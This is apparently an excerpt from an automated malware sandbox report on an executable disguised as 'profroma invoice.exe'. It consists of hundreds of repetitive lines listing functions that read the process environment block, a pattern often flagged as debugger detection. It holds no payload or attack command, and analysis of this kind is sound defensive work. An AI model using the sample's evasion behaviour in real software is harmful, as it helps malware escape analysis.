                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AA4B0 mov eax, dword ptr fs:[00000030h]4_2_017AA4B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017264AB mov eax, dword ptr fs:[00000030h]4_2_017264AB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DA49A mov eax, dword ptr fs:[00000030h]4_2_017DA49A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728770 mov eax, dword ptr fs:[00000030h]4_2_01728770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730770 mov eax, dword ptr fs:[00000030h]4_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720750 mov eax, dword ptr fs:[00000030h]4_2_01720750
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762750 mov eax, dword ptr fs:[00000030h]4_2_01762750
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AE75D mov eax, dword ptr fs:[00000030h]4_2_017AE75D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A4755 mov eax, dword ptr fs:[00000030h]4_2_017A4755
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175674D mov esi, dword ptr fs:[00000030h]4_2_0175674D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175674D mov eax, dword ptr fs:[00000030h]4_2_0175674D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175273C mov ecx, dword ptr fs:[00000030h]4_2_0175273C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175273C mov eax, dword ptr fs:[00000030h]4_2_0175273C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179C730 mov eax, dword ptr fs:[00000030h]4_2_0179C730
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C720 mov eax, dword ptr fs:[00000030h]4_2_0175C720
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720710 mov eax, dword ptr fs:[00000030h]4_2_01720710
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01750710 mov eax, dword ptr fs:[00000030h]4_2_01750710
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C700 mov eax, dword ptr fs:[00000030h]4_2_0175C700
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017247FB mov eax, dword ptr fs:[00000030h]4_2_017247FB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017427ED mov eax, dword ptr fs:[00000030h]4_2_017427ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AE7E1 mov eax, dword ptr fs:[00000030h]4_2_017AE7E1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172C7C0 mov eax, dword ptr fs:[00000030h]4_2_0172C7C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A07C3 mov eax, dword ptr fs:[00000030h]4_2_017A07C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017207AF mov eax, dword ptr fs:[00000030h]4_2_017207AF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D47A0 mov eax, dword ptr fs:[00000030h]4_2_017D47A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C678E mov eax, dword ptr fs:[00000030h]4_2_017C678E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01752674 mov eax, dword ptr fs:[00000030h]4_2_01752674
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E866E mov eax, dword ptr fs:[00000030h]4_2_017E866E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A660 mov eax, dword ptr fs:[00000030h]4_2_0175A660
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173C640 mov eax, dword ptr fs:[00000030h]4_2_0173C640
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E627 mov eax, dword ptr fs:[00000030h]4_2_0173E627
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01756620 mov eax, dword ptr fs:[00000030h]4_2_01756620
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01758620 mov eax, dword ptr fs:[00000030h]4_2_01758620
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172262C mov eax, dword ptr fs:[00000030h]4_2_0172262C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01762619 mov eax, dword ptr fs:[00000030h]4_2_01762619
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E609 mov eax, dword ptr fs:[00000030h]4_2_0179E609
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173260B mov eax, dword ptr fs:[00000030h]4_2_0173260B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E6F2 mov eax, dword ptr fs:[00000030h]4_2_0179E6F2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A06F1 mov eax, dword ptr fs:[00000030h]4_2_017A06F1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0175A6C7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A6C7 mov eax, dword ptr fs:[00000030h]4_2_0175A6C7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017566B0 mov eax, dword ptr fs:[00000030h]4_2_017566B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C6A6 mov eax, dword ptr fs:[00000030h]4_2_0175C6A6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724690 mov eax, dword ptr fs:[00000030h]4_2_01724690
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C4978 mov eax, dword ptr fs:[00000030h]4_2_017C4978
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AC97C mov eax, dword ptr fs:[00000030h]4_2_017AC97C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01746962 mov eax, dword ptr fs:[00000030h]4_2_01746962
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176096E mov edx, dword ptr fs:[00000030h]4_2_0176096E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176096E mov eax, dword ptr fs:[00000030h]4_2_0176096E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A0946 mov eax, dword ptr fs:[00000030h]4_2_017A0946
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4940 mov eax, dword ptr fs:[00000030h]4_2_017F4940
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A892A mov eax, dword ptr fs:[00000030h]4_2_017A892A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B892B mov eax, dword ptr fs:[00000030h]4_2_017B892B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AC912 mov eax, dword ptr fs:[00000030h]4_2_017AC912
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718918 mov eax, dword ptr fs:[00000030h]4_2_01718918
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E908 mov eax, dword ptr fs:[00000030h]4_2_0179E908
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017529F9 mov eax, dword ptr fs:[00000030h]4_2_017529F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AE9E0 mov eax, dword ptr fs:[00000030h]4_2_017AE9E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172A9D0 mov eax, dword ptr fs:[00000030h]4_2_0172A9D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017549D0 mov eax, dword ptr fs:[00000030h]4_2_017549D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EA9D3 mov eax, dword ptr fs:[00000030h]4_2_017EA9D3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B69C0 mov eax, dword ptr fs:[00000030h]4_2_017B69C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A89B3 mov esi, dword ptr fs:[00000030h]4_2_017A89B3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A89B3 mov eax, dword ptr fs:[00000030h]4_2_017A89B3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A89B3 mov eax, dword ptr fs:[00000030h]4_2_017A89B3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A0 mov eax, dword ptr fs:[00000030h]4_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017209AD mov eax, dword ptr fs:[00000030h]4_2_017209AD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017209AD mov eax, dword ptr fs:[00000030h]4_2_017209AD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AE872 mov eax, dword ptr fs:[00000030h]4_2_017AE872
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AE872 mov eax, dword ptr fs:[00000030h]4_2_017AE872
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6870 mov eax, dword ptr fs:[00000030h]4_2_017B6870
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6870 mov eax, dword ptr fs:[00000030h]4_2_017B6870
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01750854 mov eax, dword ptr fs:[00000030h]4_2_01750854
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724859 mov eax, dword ptr fs:[00000030h]4_2_01724859
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01724859 mov eax, dword ptr fs:[00000030h]4_2_01724859
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01732840 mov ecx, dword ptr fs:[00000030h]4_2_01732840
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov ecx, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742835 mov eax, dword ptr fs:[00000030h]4_2_01742835
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175A830 mov eax, dword ptr fs:[00000030h]4_2_0175A830
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C483A mov eax, dword ptr fs:[00000030h]4_2_017C483A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C483A mov eax, dword ptr fs:[00000030h]4_2_017C483A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AC810 mov eax, dword ptr fs:[00000030h]4_2_017AC810
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C8F9 mov eax, dword ptr fs:[00000030h]4_2_0175C8F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175C8F9 mov eax, dword ptr fs:[00000030h]4_2_0175C8F9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EA8E4 mov eax, dword ptr fs:[00000030h]4_2_017EA8E4
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174E8C0 mov eax, dword ptr fs:[00000030h]4_2_0174E8C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F08C0 mov eax, dword ptr fs:[00000030h]4_2_017F08C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AC89D mov eax, dword ptr fs:[00000030h]4_2_017AC89D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720887 mov eax, dword ptr fs:[00000030h]4_2_01720887
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171CB7E mov eax, dword ptr fs:[00000030h]4_2_0171CB7E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01718B50 mov eax, dword ptr fs:[00000030h]4_2_01718B50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CEB50 mov eax, dword ptr fs:[00000030h]4_2_017CEB50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D4B4B mov eax, dword ptr fs:[00000030h]4_2_017D4B4B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D4B4B mov eax, dword ptr fs:[00000030h]4_2_017D4B4B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6B40 mov eax, dword ptr fs:[00000030h]4_2_017B6B40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6B40 mov eax, dword ptr fs:[00000030h]4_2_017B6B40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EAB40 mov eax, dword ptr fs:[00000030h]4_2_017EAB40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C8B42 mov eax, dword ptr fs:[00000030h]4_2_017C8B42
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174EB20 mov eax, dword ptr fs:[00000030h]4_2_0174EB20
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174EB20 mov eax, dword ptr fs:[00000030h]4_2_0174EB20
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E8B28 mov eax, dword ptr fs:[00000030h]4_2_017E8B28
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E8B28 mov eax, dword ptr fs:[00000030h]4_2_017E8B28
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4B00 mov eax, dword ptr fs:[00000030h]4_2_017F4B00
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174EBFC mov eax, dword ptr fs:[00000030h]4_2_0174EBFC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017ACBF0 mov eax, dword ptr fs:[00000030h]4_2_017ACBF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CEBD0 mov eax, dword ptr fs:[00000030h]4_2_017CEBD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730BBE mov eax, dword ptr fs:[00000030h]4_2_01730BBE
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730BBE mov eax, dword ptr fs:[00000030h]4_2_01730BBE
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D4BB0 mov eax, dword ptr fs:[00000030h]4_2_017D4BB0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D4BB0 mov eax, dword ptr fs:[00000030h]4_2_017D4BB0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179CA72 mov eax, dword ptr fs:[00000030h]4_2_0179CA72
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179CA72 mov eax, dword ptr fs:[00000030h]4_2_0179CA72
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CEA60 mov eax, dword ptr fs:[00000030h]4_2_017CEA60
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730A5B mov eax, dword ptr fs:[00000030h]4_2_01730A5B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730A5B mov eax, dword ptr fs:[00000030h]4_2_01730A5B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01744A35 mov eax, dword ptr fs:[00000030h]4_2_01744A35
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01744A35 mov eax, dword ptr fs:[00000030h]4_2_01744A35
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175CA38 mov eax, dword ptr fs:[00000030h]4_2_0175CA38
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175CA24 mov eax, dword ptr fs:[00000030h]4_2_0175CA24
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174EA2E mov eax, dword ptr fs:[00000030h]4_2_0174EA2E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017ACA11 mov eax, dword ptr fs:[00000030h]4_2_017ACA11
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175AAEE mov eax, dword ptr fs:[00000030h]4_2_0175AAEE
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175AAEE mov eax, dword ptr fs:[00000030h]4_2_0175AAEE
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720AD0 mov eax, dword ptr fs:[00000030h]4_2_01720AD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01754AD0 mov eax, dword ptr fs:[00000030h]4_2_01754AD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01754AD0 mov eax, dword ptr fs:[00000030h]4_2_01754AD0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
